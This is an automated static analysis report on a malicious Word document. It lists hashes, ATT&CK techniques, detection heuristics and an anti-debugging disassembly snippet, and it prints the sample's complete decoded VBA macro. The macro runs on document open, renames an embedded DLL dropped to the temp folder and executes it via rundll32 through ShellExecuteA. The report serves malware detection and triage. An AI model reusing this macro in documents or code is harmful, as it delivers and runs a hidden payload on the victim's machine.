Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 543c92f5594f037b…

MALICIOUS

Office (OLE)

1.14 MB Created: 2021-06-08 08:39:00 Authoring application: Microsoft Office Word First seen: 2021-06-17
MD5: 02c4f753108081c7f52389a45a7f228d SHA-1: 5a16a12939a9edd7348aea1e84c2e4601f933b34 SHA-256: 543c92f5594f037bd1e27f9c927bbc1448ed511895a160a686f9e63c30a985c3
430 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing a VBA macro with a Document_Open auto-execution routine. This macro uses ShellExecuteA via a PtrDeclare to execute 'rundll32' with arguments pointing to 'omsh.dll', which is likely a dropped payload. The presence of an embedded PE executable and the use of Ole10Native further indicate a malicious intent to deliver and execute a secondary payload.

Heuristics 13

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.969) — 7/7 branch targets land on an instruction boundary (100% coherence)
    0009D404  64a130000000      mov eax, dword ptr fs:[0x30]
    0009D40A  8b4068            mov eax, dword ptr [eax + 0x68]
    0009D40D  c1e808            shr eax, 8
    0009D410  a801              test al, 1
    0009D412  7510              jne 0x9d424
    0009D414  ff7508            push dword ptr [ebp + 8]
    0009D417  ff1574600601      call dword ptr [0x1066074]
    0009D41D  50                push eax
    0009D41E  ff1578600601      call dword ptr [0x1066078]
    0009D424  ff7508            push dword ptr [ebp + 8]
    0009D427  e82d000000        call 0x9d459
    0009D42C  59                pop ecx
    0009D42D  ff7508            push dword ptr [ebp + 8]
    0009D430  ff15e8600601      call dword ptr [0x10660e8]
    0009D436  cc                int3
    0009D437  e8e2100100        call 0xae51e
    0009D43C  83f801            cmp eax, 1
    0009D43F  7415              je 0x9d456
    0009D441  648b0d30000000    mov ecx, dword ptr fs:[0x30]
    0009D448  8b4968            mov ecx, dword ptr [ecx + 0x68]
    0009D44B  c1e908            shr ecx, 8
    0009D44E  f6c101            test cl, 1
    0009D451  7503              jne 0x9d456
    0009D453  b001              mov al, 1
    0009D455  c3                ret
    0009D456  32c0              xor al, al
    0009D458  c3                ret
    0009D459  8bff              mov edi, edi
    0009D45B  55                push ebp
    0009D45C  8bec              mov ebp, esp
    0009D45E  51                push ecx
    0009D45F  8365fc00          and dword ptr [ebp - 4], 0
    0009D463  8d                .byte 0x8d
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Ole10Native package carries executable/script file type high OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in an executable or script-capable extension. Even without UI extension spoofing, embedding a runnable payload inside an Office document is a high-risk delivery pattern.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Set FSO = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2114 bytes
SHA-256: 919173ba39a62c6a171e4e84e02f9ee0db4d3ea27bb5a206ac7e07964c450503
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text


  Private Declare PtrSafe Function gc Lib "shell32" _
        Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, ByVal lpFile As String, _
        ByVal lpParameters As String, ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long
Dim hdv As String
Private Sub Document_Open()
Dim vcbc As String
vcbc = Options.DefaultFilePath(wdAutoRecoverPath)
Dim xc
xc = "texmp"
If Dir(vcbc & "\omsh.dll") = "" Then
Call yyy

Call xxx

If Len(hdv) > 2 Then

Call nam(hdv)

Dim ued As String
ued = ".exe"



  gc 0, vbNullString, _
    "rundl" & "l32", Options.DefaultFilePath(wdAutoRecoverPath) & "\omsh.dll,TFPWQPUJLMG", _
     vbNullString, 1
End If
End If
End Sub
Sub yyy()
  Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
End Sub
Sub xxx()
Dim usx
usx = Options.DefaultFilePath(wdTempFilePath)
 Dim FSO As Object
   Set FSO = CreateObject("Scripting.FileSystemObject")
Call Search(FSO.GetFolder(usx), hdv)
End Sub


Attribute VB_Name = "Module1"
Sub bvcbc()
Dim fdsf
fdsf = "ngffds"
End Sub
Sub nam(pafs As String)
Name pafs As Options.DefaultFilePath(wdAutoRecoverPath) & "\omsh.dll"
End Sub
Sub bcvsf()
Dim cxv
cxv = "vdcvdsf"
End Sub



 
 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object

  
   For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc
Dim Ters As Object
   For Each Ters In mds.Files
   
   If Ters.Name = "omh.dll" Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub
embedded_office_0008f46e.exe embedded-pe Office MZ+PE at offset 0x8F46E 609170 bytes
SHA-256: 7d0eed187b6cdead8f2df01466f2079e8d31880b0ab3e9afd993b2bce2b4c55d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, VirtualProtectEx, OpenProcess, RegOpenKeyExA Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1684621631/Ole10Native 576300 bytes
SHA-256: c49a57894e81f5a5d6f9e00b7e5641ec89cc55736587ef9e3b2597c0c77fc38e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, VirtualProtectEx, OpenProcess, RegOpenKeyExA
ole10native_00_omh.dll ole-package-payload OLE Ole10Native payload: ObjectPool/_1684621631/Ole10Native; display_name=omh.dll; full_path=C:\Users\MyPc\AppData\Local\Temp\omh.dll; temp_path=; def_file= 576000 bytes
SHA-256: 061da9f77365d9f1e755080321b22b6931be6ee002bf99215ae5a1083cc25d0c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, VirtualProtectEx, OpenProcess, RegOpenKeyExA